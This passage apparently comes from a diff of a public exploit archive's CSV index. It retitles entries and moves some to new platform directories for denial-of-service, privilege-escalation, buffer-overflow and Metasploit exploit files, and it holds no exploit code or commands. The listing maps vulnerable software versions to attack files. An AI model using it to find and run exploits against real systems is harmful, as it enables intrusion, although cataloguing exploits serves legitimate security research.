39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0
@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0
39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21
39797,platforms/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",win_x86,dos,21
39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0
39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0
39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
@ -5396,7 +5396,7 @@ id,file,description,date,author,platform,type,port
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@ -5520,7 +5520,7 @@ id,file,description,date,author,platform,type,port
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
@ -5607,8 +5607,8 @@ id,file,description,date,author,platform,type,port
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
@ -5654,7 +5654,7 @@ id,file,description,date,author,platform,type,port
1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0
1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta",windows,local,0
1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
@ -5675,8 +5675,8 @@ id,file,description,date,author,platform,type,port
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Privilege Escalation",2006-07-15,h00lyshit,linux,local,0
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
@ -5721,7 +5721,7 @@ id,file,description,date,author,platform,type,port
2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0
40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0
2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0
2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
@ -5855,7 +5855,7 @@ id,file,description,date,author,platform,type,port
4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0
6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0
6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
@ -6127,7 +6127,7 @@ id,file,description,date,author,platform,type,port
9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
@ -6202,7 +6202,7 @@ id,file,description,date,author,platform,type,port
9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0
9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",lin_x86,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local,0
@ -6582,8 +6582,8 @@ id,file,description,date,author,platform,type,port
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
@ -6608,7 +6608,7 @@ id,file,description,date,author,platform,type,port
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)",2010-10-22,"Tavis Ormandy",linux,local,0
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0
15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0
@ -6658,7 +6658,7 @@ id,file,description,date,author,platform,type,port
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
@ -6723,7 +6723,7 @@ id,file,description,date,author,platform,type,port
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
@ -6760,7 +6760,7 @@ id,file,description,date,author,platform,type,port
16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -6870,7 +6870,7 @@ id,file,description,date,author,platform,type,port
17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0
17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0
17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0
17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0
@ -7277,8 +7277,8 @@ id,file,description,date,author,platform,type,port
19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0
@ -7581,8 +7581,8 @@ id,file,description,date,author,platform,type,port
21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0
21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation",2002-06-03,badc0ded,linux,local,0
21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0
21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0
21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0
@ -7595,7 +7595,7 @@ id,file,description,date,author,platform,type,port
21565,platforms/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0
21566,platforms/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0
21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local,0
40348,platforms/windows/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",windows,local,0
